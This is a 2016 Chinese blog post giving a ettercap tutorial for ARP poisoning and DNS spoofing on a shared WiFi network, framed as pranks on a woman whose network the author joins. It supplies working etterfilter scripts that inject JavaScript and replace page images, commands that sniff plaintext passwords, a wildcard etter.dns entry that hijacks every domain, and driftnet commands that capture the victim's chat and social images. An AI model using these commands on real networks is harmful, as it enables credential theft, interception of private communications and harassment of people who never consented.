美文网首页
关于毒化内网DNS劫持搞事情

关于毒化内网DNS劫持搞事情

作者: i轻 | 来源:发表于2016-11-07 09:41 被阅读0次

    前言:

    作为单身狗,你就甘心拿着笔记本蹭着垃圾WiFi聊天刷微博吗?

    来自单身狗的怨念告诉我们:不,我们要搞事情!!!(蹭着妹纸的WiFi顺手调戏之,才是王道~)

    做案工具:

    Kali Linux(咳咳,开始。。。)

    正文:

    1、首先是安装个ettercap

    sudo apt-get install ettercap

    2、咱们来弹个窗吧~

    这个我们一般用alert的filter脚本

    if(ip.proto==TCP&&tcp.dst==80){

    if(search(DATA.data,"Accept-Encoding")){

    replace("Accept-Encoding","Accept-Rubbish!");

    #note:replacementstringissamelengthasoriginalstring

    #msg("zapped Accept-Encoding!\n");

    }

    }

    if(ip.proto==TCP&&tcp.src==80){

    replace("","alert("hello,ichunqiu!");");

    replace("","alert("hello,ichunqiu!");");

    msg("OK!!\n");

    }

    3、先编译成程序识别的文件

    etterfilter alert.filter -o alert.ef

    4、然后在命令中加载(实际测试命令行有bug,请在图形化界面使用ettercap -G)

    ettercap -T -q -i eth0 -F alert.ef -M arp:remote -P dns_spoof /// ///

    5、然后当妹子打开浏览器上个网页就。。

    6、当然也可以替换网页中的图片,比如换了百度的logo,但这并没有好大意义。

    if(ip.proto==TCP&&tcp.dst==80){

    if(search(DATA.data,"Accept-Encoding")){

    replace("Accept-Encoding","Accept-Rubbish!");

    #note:replacementstringissamelengthasoriginalstring

    #msg("zapped Accept-Encoding!\n");

    }

    }

    if(ip.proto==TCP&&tcp.src==80){

    replace("img src=","img src=http://pic2016.5442.com:82/2016/0909/45/2.jpg!960.jpg;");

    replace("IMG SRC=","img src=http://pic2016.5442.com:82/2016/0909/45/2.jpg!960.jpg");

    msg("ok!!\n");

    }

    当然你可以来玩些其他的东西~

    1、想邪恶的抓取妹子某些网站的某些明文密码吗?

    ettercap嗅探吧

    ifconfig得到kali的网卡,例:eth0,然后

    sudo ettercap -i eth0 -Tq -M arp:remote /// ///

    比如说wordpress博客明文密码被截取

    2、想给妹子推送表白网页吗

    这里用到DNS劫持

    先搭建个表白网页,如在:192.168.1.102

    修改ettercap的DNS配置文件

    sudo vim /etc/ettercap/etter.dns

    最后的注释上面加上

    * A 192.168.1.102

    即把所有域名解析到这个ip

    然后加载dns_spoof插件开始欺骗

    ettercap -T -i wlan0 -q -P dns_spoof /// ///

    为什么我是单身狗,因为我就算DNS劫持也没有表白!!!

    3、想截取妹子的社交照片吗

    这用ettercap配合driftnet是极好的

    还是先来嗅探

    sudo ettercap -i eth0 -Tq -M arp:remote /// ///

    然后

    sudo driftnet -i eth0 -b -a

    解释下这几个参数

    -i 监听网卡

    -b 声音提醒

    -a 保存图片(这样的话图片不会显示在)

    -d 图片保存目录,例:driftnet -i eth0 -b -a -d /pic

    看图,误差在于缓存的图片不再加载,我测试聊天记录图片也被读取了。。这个比较6

    文中所讲都为毒化整个内网,测试需要谨慎,有可能会造成整个内网网络异常,如果你在办公室,不怕被打死,可以试试。

    相关文章

      网友评论

          本文标题:关于毒化内网DNS劫持搞事情

          本文链接:https://www.haomeiwen.com/subject/dbanuttx.html